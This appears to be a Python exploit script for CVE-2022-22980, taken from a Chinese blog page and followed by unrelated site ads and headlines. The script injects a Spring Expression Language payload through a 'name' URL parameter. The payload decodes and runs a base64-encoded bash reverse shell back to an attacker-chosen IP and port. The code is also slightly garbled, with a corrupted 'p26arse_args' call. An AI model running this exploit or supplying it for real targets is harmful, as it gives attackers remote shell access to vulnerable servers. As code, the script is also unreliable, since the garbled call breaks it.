import requests
import urllib
import base64
import argparse
def poc(url,ip,prot):
urll=f'{url}/?name='
shell=f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
shell=shell.encode('utf-8')
shell=base64.b64encode(shell)
shell=shell.decode('utf-8')
payload="T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('bash -c {echo,"+shell+"}|{base64,-d}|{bash,-i}')"
print(payload)
data = payload.encode('utf-8')
payload = urllib.parse.quote(data)
requests.get(url=urll+payload,verify=False)
def main():
parser=argparse.ArgumentParser(" python CVE-2022-22980.py -u http:192.168.56.200 -i 192.168.56.200 -p 1234")
parser.add_argument('-u','--url',dest='url',help='输入漏洞url')
parser.add_argument('-i','--ip',dest='ip',help='输入ip')
parser.add_argument('-p','--prot',dest='prot',help='输入反弹端口')
args=parser.p26arse_args()
if args.url:
poc(args.url,args.ip,args.prot)
else:
print('-h 帮助')
if __name__ == '__main__':
main()
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)